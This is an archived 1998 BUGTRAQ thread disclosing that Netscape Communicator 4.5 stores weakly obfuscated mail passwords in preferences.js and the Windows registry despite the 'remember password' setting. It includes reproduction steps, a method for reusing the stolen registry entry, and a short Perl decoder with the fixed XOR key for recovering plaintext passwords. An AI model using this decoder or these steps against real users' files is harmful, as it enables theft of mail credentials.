Date: Wed, 4 Nov 1998 18:29:55 +0100 From: Holger van Lengerich To: BUGTRAQ@netspace.org Subject: Communicator 4.5 stores EVERY mail-password in preferences.js Hi! The Netscape Communicator 4.5 stores the crypted version of used mail-passwords (for imap and pop3) even if you tell Netscape to *not* "remember password" in the preferences dialog. Damage: ======= IMHO this means, that anybody who can read your preferences.js ("prefs.js" in the MS dominion) is problably able to read your mail or even get your plaintext-password. How to reproduce: ================= - start Communicator - be sure "remember password" is disabled in the preferences dialog for the "Incoming Mail Server". - get mails from Server (you get asked for your mail-password) - exit Communicator - edit preferences.js in $HOME/.netscape (MS-Users: prefs.js in your NS-Profile-Path) - search for something like: --- 8< --- user_pref("mail.imap.server.mail.password", "cRYpTPaSswD="); user_pref("mail.imap.server.mail.remember_password", false); --- >8 --- - Now change "false" to "true". - Save the file - Start Communicator - get mails ... now you are not asked for any password but can read all your mail! :( Affected: ========= probably all Communicator-4.5-packages on ALL operating systems. I was able to reproduce this behavior on: - Sun Solaris - Linux (glibc2) - MS Windows NT. Workaround: =========== Don't use Communicator 4.5 to fetch mails from your IMAP/POP server or be very sure that no one can read your Netscape-preferences-file!!! Regards, Holger van Lengerich, "pine"-user :) PS: The preferences.js is send to Netscape on Communicator-crash, isn't it? ---------------------------------------------------------------------------- Holger van Lengerich - University of Paderborn - Dept. of Computer Science System-Administration - Warburger Str. 100 - D 33098 Paderborn - Germany mailto:gimli@uni-paderborn.de - http://www.uni-paderborn.de/admin/gimli ---------------------------------------------------------------------------- Date: Wed, 4 Nov 1998 17:20:27 -0600 From: HD Moore To: BUGTRAQ@netspace.org Subject: Re: Communicator 4.5 stores EVERY mail-password in preferences.js In the Windows environment prefs.js isnt the only place that your password is stored. Netscape also creates a registry entry for your password (garbled as well) that any admin on your local LAN (or some cracker over the internet) can read by remotely connecting to your registry. The path it is stored in is: HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\biff\users\\servers\\password This is with the 'dont save password option' checked on 4.5 (netscape.exe internal version: 4.50.2.19) By any chance does anyone know how the password is encrypted or how strong of encryption is used? I also managed to copy that registry entry onto a separate computer (while messenger was already open and I had checked my mail once), changed the hostname of the mail server entry to match and successfully retrieved mail with that account while sniffing the plain text pop3 pass over my dialup... --------------------------------------------------------------------------- Date: Sat, 7 Nov 1998 11:41:31 +0100 From: Holger van Lengerich To: BUGTRAQ@netspace.org Subject: NS-C4.5 & Mail-Passwords Hi, It turned out, that only IMAP-Passwords are stored in the preferences.js after the Communicator process is correctly terminated. POP passwords are stored in preferences.js, at the first time you fetch mail from the server and cleared at Communicator exit. This happened using C4.5 on Sun Solaris. Some of you may reproduce this for other OS's and send me any feedback (NOT via bugtraq). Even this is a security problem: - Using an multiuser-OS like Unix: an evil user may access the preferences file, while you are working with Communicator. - Files may be accessible via network shares. - In a crash situation the password may not be cleared from the preferences.js - In this case the "Quality Feedback Agent" (QFA) may, if you allow him to do so, transfer the preferences.js (w. crypted password) via Internet, (readable at any host on the way to Netscape Corp.) Be aware that the encryption of the password gives *NO* security. You don't need to know the decryption-algorithm, because Communicator itself can do the decryption for you. By using a packet sniffer (like HD-MOORE) or setting up a patched IMAP-/POP-Server with a password logging facility, you can easily get the plaintext-passwords. Regards, Holger van Lengerich ---------------------------------------------------------------------------- Holger van Lengerich - University of Paderborn - Dept. of Computer Science System-Administration - Warburger Str. 100 - D 33098 Paderborn - Germany mailto:gimli@uni-paderborn.de - http://www.uni-paderborn.de/admin/gimli ---------------------------------------------------------------------------- Date: Fri, 6 Nov 1998 16:07:45 -0800 From: Thievco To: BUGTRAQ@netspace.org Subject: Re: Which crypto algorithm? was: Communicator 4.5 stores EVERYmail-password in preferences.js (decoder) >Does anybody know the algorithm used to encrypt the passwords in >Communicator?? Apparantly, it takes the plaintext, xors it with a fixed string, and base64 encodes the result: use MIME::Base64; print ((decode_base64('NLyIPunfKw==')) ^ ("\x56" . "\xc9" . "\xef" . "\x4a" . "\x9b" . "\xbe" . "\x5a")); You need the MIME perl module. This one is good up to 7 characters, because that's how long a couple of POP passwords I have are :) Should be pretty straightforward to extend beyond 7 characters.. just take the encoded string from the prefs file, base64 decode it, and xor it with your password in plaintext. What you'll get is the fixed string to xor with.. just extend the bytes I have above. The sequence of bytes is non-obvious as to the meaning (at least to me.) It doesn't spell anything in ASCII. Let me know if it doesn't work on your passwords.. I'm curious. I only had a couple to try. BB